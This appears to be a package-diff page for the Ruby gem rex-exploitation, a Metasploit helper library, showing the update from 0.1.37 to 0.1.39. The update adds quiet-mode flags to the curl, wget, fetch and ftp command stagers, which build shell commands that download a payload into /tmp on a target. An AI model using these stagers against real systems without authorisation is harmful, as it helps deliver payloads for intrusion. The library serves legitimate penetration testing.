rex-exploitation 0.1.37 → 0.1.39
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/cortex.yaml +15 -0
- data/lib/rex/exploitation/cmdstager/curl.rb +4 -2
- data/lib/rex/exploitation/cmdstager/fetch.rb +4 -2
- data/lib/rex/exploitation/cmdstager/ftp_http.rb +4 -1
- data/lib/rex/exploitation/cmdstager/wget.rb +4 -2
- data/lib/rex/exploitation/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +3 -2
- metadata.gz.sig +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 8ef72cba0536238799b96a89b69cfefd84c8732ca35c9eb7dd6e259850953a23
|
4
|
+
data.tar.gz: 2cf156e9669cad115b7b671661efffa6e71d3e746b2808be61b82d872e4556e2
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 272e99cda9c7fd16d30f9d4138a08c3e1521591c01e3fe1d91389279846775298e334671550cdb0b731f171df7f067562c6caf7bc0bf04e8ac7596607bc432a3
|
7
|
+
data.tar.gz: e528c225a015011b89622f3017f226e64e6184b8945128baba71482d7730407a2ce6c54d68299ed69419f831f3c8ff8e611ff8ed7ecf75c14c0e70791373f596
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data/cortex.yaml
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
---
|
2
|
+
info:
|
3
|
+
title: Rex Exploitation
|
4
|
+
description: Rex library for various exploitation helpers
|
5
|
+
x-cortex-git:
|
6
|
+
github:
|
7
|
+
alias: r7org
|
8
|
+
repository: rapid7/rex-exploitation
|
9
|
+
x-cortex-tag: rex-exploitation
|
10
|
+
x-cortex-type: service
|
11
|
+
x-cortex-domain-parents:
|
12
|
+
- tag: metasploit
|
13
|
+
openapi: 3.0.1
|
14
|
+
servers:
|
15
|
+
- url: "/"
|
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
@@ -25,12 +26,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
|
|
25
26
|
def generate_cmds_payload(opts)
|
26
27
|
cmds = []
|
27
28
|
uri = opts[:payload_uri]
|
29
|
+
silent_flag = opts[:silent] ? 's' : ''
|
28
30
|
|
29
31
|
if opts[:ssl]
|
30
|
-
cmds << "curl
|
32
|
+
cmds << "curl -#{silent_flag}ko #{@payload_path} #{uri}"
|
31
33
|
else
|
32
34
|
uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
|
33
|
-
cmds << "curl
|
35
|
+
cmds << "curl -#{silent_flag}o #{@payload_path} #{uri}"
|
34
36
|
end
|
35
37
|
|
36
38
|
cmds
|
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
@@ -26,10 +27,11 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
|
|
26
27
|
cmds = []
|
27
28
|
nvp = '--no-verify-peer'
|
28
29
|
|
30
|
+
silent_flag = opts[:silent] ? 'q' : ''
|
29
31
|
if opts[:ssl]
|
30
|
-
cmds << "fetch
|
32
|
+
cmds << "fetch -#{silent_flag}o #{@payload_path} #{nvp} #{opts[:payload_uri]}"
|
31
33
|
else
|
32
|
-
cmds << "fetch
|
34
|
+
cmds << "fetch -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"
|
33
35
|
end
|
34
36
|
|
35
37
|
cmds
|
@@ -17,14 +17,17 @@ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
23
24
|
end
|
24
25
|
|
25
26
|
def generate_cmds_payload(opts)
|
27
|
+
# -V: disable verbose output (quiet mode)
|
28
|
+
silent_flag = opts[:silent] ? 'V' : ''
|
26
29
|
# -o: output file name (argument must be before URL)
|
27
|
-
["ftp
|
30
|
+
["ftp -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"]
|
28
31
|
end
|
29
32
|
|
30
33
|
def generate_cmds_decoder(opts)
|
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
@@ -27,12 +28,13 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
|
|
27
28
|
|
28
29
|
uri = opts[:payload_uri]
|
29
30
|
ncc = '--no-check-certificate'
|
31
|
+
silent_flag = opts[:silent] ? 'q' : ''
|
30
32
|
|
31
33
|
if opts[:ssl]
|
32
|
-
cmds << "wget
|
34
|
+
cmds << "wget -#{silent_flag}O #{@payload_path} #{ncc} #{uri}"
|
33
35
|
else
|
34
36
|
uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
|
35
|
-
cmds << "wget
|
37
|
+
cmds << "wget -#{silent_flag}O #{@payload_path} #{uri}"
|
36
38
|
end
|
37
39
|
|
38
40
|
cmds
|
data.tar.gz.sig
CHANGED
Binary file
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-exploitation
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.39
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Metasploit Hackers
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
93
93
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
94
94
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date: 2023-
|
96
|
+
date: 2023-10-04 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
99
|
name: rake
|
@@ -226,6 +226,7 @@ files:
|
|
226
226
|
- Rakefile
|
227
227
|
- bin/console
|
228
228
|
- bin/setup
|
229
|
+
- cortex.yaml
|
229
230
|
- data/exploits/cmdstager/debug_asm
|
230
231
|
- data/exploits/cmdstager/debug_write
|
231
232
|
- data/exploits/cmdstager/vbs_b64
|
metadata.gz.sig
CHANGED
@@ -1 +1 @@
|
|
1
|
-
|
1
|
+
��
|